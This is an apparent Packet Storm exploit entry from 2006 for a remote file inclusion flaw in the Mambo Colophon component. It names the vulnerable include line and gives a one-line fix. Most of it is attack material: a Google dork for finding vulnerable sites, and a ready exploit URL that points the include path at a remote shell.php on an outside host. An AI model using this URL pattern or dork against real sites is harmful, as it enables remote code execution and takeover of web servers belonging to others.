colophon.txt

2006-08-03T00:00:00
ID PACKETSTORM:48780
Type packetstorm
Reporter Drago84
Modified 2006-08-03T00:00:00

Description

                                        
                                            `########### REMOTE COMMAND Mambo Colophon =<1.2 ##by   
#Drago84#########  
  
Found By Drago84  
Exclusive Security Italian Security  
  
This bug allows a remote atacker to execute commands via  
rfi  
  
  
page:  
admin.colophon.php  
  
bug:   
require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php");  
  
path:  
add in admin.colophon.php  
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );  
  
dork: inurl:com_colophon  
  
expl:  
htttp:/www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?  
  
`